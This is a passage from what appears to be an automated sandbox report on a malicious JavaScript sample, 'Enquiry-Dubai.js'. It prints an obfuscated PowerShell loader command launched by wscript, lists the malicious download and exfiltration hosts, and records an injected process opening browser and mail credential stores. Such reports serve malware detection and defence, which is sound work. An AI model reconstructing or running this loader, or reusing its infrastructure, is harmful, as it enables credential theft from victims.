tslanshacksgeslanshackszwblslanshacksf8slanshacksmgslanshackswslanshacksdislanshacksnqslanshackswslanshacksdmslanshacksmqslanshacks4slanshacksc8slanshacksbgblslanshackshcslanshacksxwbpslanshacksg0slanshacksyqbnslanshacksguslanshackslgbqslanshackshslanshacksslanshackszwslanshacksnslanshacksdsslanshacksjslanshacksbwslanshacksgeslanshackscgb0slanshacksgkslanshacksywbpslanshackshslanshacksslanshacksyqbuslanshacksgmslanshackseqslanshacksgslanshacksd0slanshacksislanshacksboslanshacksguslanshacksdwslanshackstslanshackse8slanshacksygbqslanshacksguslanshacksywb0slanshackscslanshacksslanshacksuwb5slanshackshmslanshacksdslanshacksblslanshacksg0slanshackslgboslanshacksguslanshacksdslanshacksslanshacksuslanshacksfcslanshackszqbislanshacksemslanshacksbslanshacksbpslanshacksguslanshacksbgb0slanshacksdsslanshacksjslanshacksbzslansh
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command ""$codigo = 'jslanshacksbtslanshacksg8slanshacksdslanshacksbvslanshackshislanshacksygbpslanshacksgsslanshackszqbkslanshackscslanshacksslanshackspqslanshacksgslanshacksccslanshacksiwb4slanshackscmslanshackslgslanshackszslanshacksdislanshacksmgslanshacksvslanshackshyslanshackszqbkslanshacksc4slanshacksmgbyslanshacksc4slanshacksmgslanshacks5slanshacksgqslanshacksmwslanshacks5slanshacksdmslanshackszqbjslanshacksgyslanshacksmslanshacksslanshacksyslanshacksduslanshacksoslanshacksslanshacks2slanshacksgqslanshacksyqbislanshacksgyslanshacksmslanshacksslanshacks0slanshacksgyslanshacksmslanshacksblslanshacksgeslanshacksmslanshacksbkslanshacksdslanshacksslanshacksygbmslanshacksdcslanshackszgslanshacks2slanshacksc0slanshacksygb1slanshackshslanshacksslanshackslwslanshacksvslanshacksdoslanshackscwbwslanshackscmslanshacksiwboslanshacksccslanshacksowslanshackskslanshackshmslanshacksaslanshacksbhslanshacksg0slanshacksyqb0slanshacksguslanshacksdqbyslanshacksgkslanshackscwbtslanshackscslanshacksslanshackspqslanshacksgslanshackscqslanshacksbqbvslanshackshqslanshacksbwbyslanshacksgislanshacksaqbrslanshacksguslanshackszslanshacksslanshacksgslanshacksc0slanshackscgblslanshackshslanshacksslanshacksbslanshacksbhslanshacksgmslanshackszqslanshacksgslanshacksccslanshacksiwslanshacksnslanshackscwslanshacksislanshacksslanshacksnslanshackshqslanshacksjwslanshacks7slanshackscqslanshacksaslanshacksblslanshacksg4slanshacksywboslanshacksgkslanshacksbgbnslanshackscslanshacksslanshackspqslanshacksgslanshacksccslanshacksaslanshacksb0slanshackshqslanshackscslanshacksbzslanshacksdoslanshackslwslanshacksvslanshacksgkslanshacksyqslanshacks2slanshacksdslanshacksslanshacksmslanshacksslanshacksyslanshacksdslanshacksslanshacksnslanshacksslanshacksuslanshackshuslanshackscwslanshacksuslanshacksgeslanshackscgbjslanshacksggslanshacksaqb2slanshacksguslanshackslgbvslanshackshislanshackszwslanshacksvslanshacksdislanshacksnqslanshacksvslanshacksgkslanshacksdslanshacksblslanshacksg0slanshackscwslanshacksvslanshacksg4slanshackszqb3slanshacksf8slanshacksaqbtslanshacksgeslanshackszwblslanshacksf8slanshacksmgslanshackswslanshacksdislanshacksnqslanshackswslanshacksdmslanshacksmqslanshacks4slanshacksc8slanshacksbgblslanshackshcslanshacksxwbpslanshacksg0slanshacksyqbnslanshacksguslanshackslgbqslanshackshslanshacksslanshackszwslanshacksnslanshacksdsslanshacksjslanshacksbwslanshacksgeslanshackscgb0slanshacksgkslanshacksywbpslanshackshslanshacksslanshacksyqbuslanshacksgmslanshackseqslanshacksgslanshacksd0slanshacksislanshacksboslanshacksguslanshacksdwslanshackstslanshackse8slanshacksygbqslanshacksguslanshacksywb0slanshackscslanshacksslanshacksuwb5slanshackshmslanshacksdslanshacksblslanshacksg0slanshackslgboslanshacksguslanshacksdslanshacksslanshacksuslanshacksfcslanshackszqbislanshacksemslanshacksbslanshacksbpslanshacksguslanshacksbgb0slanshacksdsslanshacksjslanshacksbzslanshJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.1ae117de740.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.1ae113f6e18.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.2482251027.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3028, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.1ae117de740.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.1ae113f6e18.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3028, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.1ae117de740.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.1ae113f6e18.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.2482251027.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3028, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information33
                        Scripting                        		Valid Accounts231
                        Windows Management Instrumentation                        		33
                        Scripting                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		1
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		211
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        Input Capture                        		34
                        System Information Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		Logon Script (Windows)Logon Script (Windows)2
                        Obfuscated Files or Information                        		Security Account Manager531
                        Security Software Discovery                        		SMB/Windows Admin Shares1
                        Email Collection                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        PowerShell                        		Login HookLogin Hook1
                        DLL Side-Loading                        		NTDS1
                        Process Discovery                        		Distributed Component Object Model1
                        Input Capture                        		1
                        Data Encoding                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script261
                        Virtualization/Sandbox Evasion                        		LSA Secrets261
                        Virtualization/Sandbox Evasion                        		SSHKeylogging2
                        Non-Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
                        Process Injection                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input Capture13
                        Application Layer Protocol                        		Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                        System Network Configuration Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1646313 Sample: Enquiry-Dubai.js Startdate: 23/03/2025 Architecture: WINDOWS Score: 100 21 pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev 2->21 23 mail.detarcoopmedical.com 2->23 25 6 other IPs or domains 2->25 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 12 other signatures 2->49 8 wscript.exe 1 1 2->8         started        signatures3 process4 signatures5 51 JScript performs obfuscated calls to suspicious functions 8->51 53 Suspicious powershell command line found 8->53 55 Wscript starts Powershell (via cmd or directly) 8->55 57 2 other signatures 8->57 11 powershell.exe 14 15 8->11         started        process6 dnsIp7 27 pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev 172.66.0.235, 443, 49723 CLOUDFLARENETUS United States 11->27 29 ia600204.us.archive.org 207.241.227.224, 443, 49716 INTERNET-ARCHIVEUS United States 11->29 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->59 61 Writes to foreign memory regions 11->61 63 Injects a PE file into a foreign processes 11->63 15 MSBuild.exe 15 2 11->15         started        19 conhost.exe 11->19         started        signatures8 process9 dnsIp10 31 detarcoopmedical.com 161.97.124.96, 49725, 49726, 587 CONTABODE United States 15->31 33 ip-api.com 208.95.112.1, 49724, 80 TUT-ASUS United States 15->33 35 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->35 37 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->37 39 Tries to steal Mail credentials (via file / registry access) 15->39 41 2 other signatures 15->41 signatures11

                        Screenshots

                        Download Video

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Enquiry-Dubai.js6%VirustotalBrowse
                        Enquiry-Dubai.js6%ReversingLabs

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://detarcoopmedical.com0%Avira URL Cloudsafe
                        http://mail.detarcoopmedical.com0%Avira URL Cloudsafe
                        https://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev/223.txt0%Avira URL Cloudsafe
                        http://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev0%Avira URL Cloudsafe
                        http://r11.o.lencr.org0#0%Avira URL Cloudsafe
                        https://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev0%Avira URL Cloudsafe

                        Domains and IPs

                        Download Network PCAP: filteredfull

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        		199.232.214.172
                        		truefalse
                          		high
                          detarcoopmedical.com
                          		161.97.124.96
                          		truetrue
                            		unknown
                            ia600204.us.archive.org
                            		207.241.227.224
                            		truefalse
                              		high
                              ip-api.com
                              		208.95.112.1
                              		truefalse
                                		high
                                pki-goog.l.google.com
                                		142.251.40.227
                                		truefalse
                                  		high
                                  pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev
                                  		172.66.0.235
                                  		truetrue
                                    		unknown
                                    c.pki.goog
                                    		unknown
                                    		unknownfalse
                                      		high
                                      mail.detarcoopmedical.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev/223.txttrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ia600204.us.archive.org/25/items/new_image_20250318/new_image.jpgfalse
                                          		high
                                          http://ip-api.com/line/?fields=hostingfalse
                                            		high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.devpowershell.exe, 00000007.00000002.1411249717.000001AE01C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://account.dyn.com/powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                		high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://r11.o.lencr.org0#MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2479036886.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://x1.c.lencr.org/0MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2479036886.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://x1.i.lencr.org/0MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2479036886.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/powershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://r11.i.lencr.org/07MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/Licensepowershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://detarcoopmedical.comMSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://ip-api.comMSBuild.exe, 0000000A.00000002.2482251027.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/Iconpowershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ia600204.us.archive.orgpowershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://aka.ms/pscore68powershell.exe, 00000007.00000002.1411249717.000001AE00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.devpowershell.exe, 00000007.00000002.1411249717.000001AE01CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1411249717.000001AE01C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1411249717.000001AE00001000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://mail.detarcoopmedical.comMSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            208.95.112.1
                                                                            		ip-api.comUnited States
                                                                            		53334TUT-ASUSfalse
                                                                            207.241.227.224
                                                                            		ia600204.us.archive.orgUnited States
                                                                            		7941INTERNET-ARCHIVEUSfalse
                                                                            172.66.0.235
                                                                            		pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.devUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            161.97.124.96
                                                                            		detarcoopmedical.comUnited States
                                                                            		51167CONTABODEtrue

                                                                            General Information

                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1646313
                                                                            Start date and time:2025-03-23 21:47:42 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 7m 22s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:14
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • GSI enabled (Javascript)
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Enquiry-Dubai.js
                                                                            Detection:MAL
                                                                            Classification:mal100.spre.troj.spyw.expl.evad.winJS@6/3@5/4
                                                                            EGA Information:
                                                                            • Successful, ratio: 50%
                                                                            HCA Information:
                                                                            • Successful, ratio: 95%
                                                                            • Number of executed functions: 18
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .js
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 23.204.23.20, 23.203.176.221, 199.232.214.172, 20.12.23.50, 13.85.23.206, 40.69.42.241
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, e3913.cd.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                            • Execution Graph export aborted for target powershell.exe, PID 8188 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            16:48:52API Interceptor44x Sleep call for process: powershell.exe modified
                                                                            16:49:04API Interceptor52x Sleep call for process: MSBuild.exe modified

                                                                            Joe Sandbox View / Context

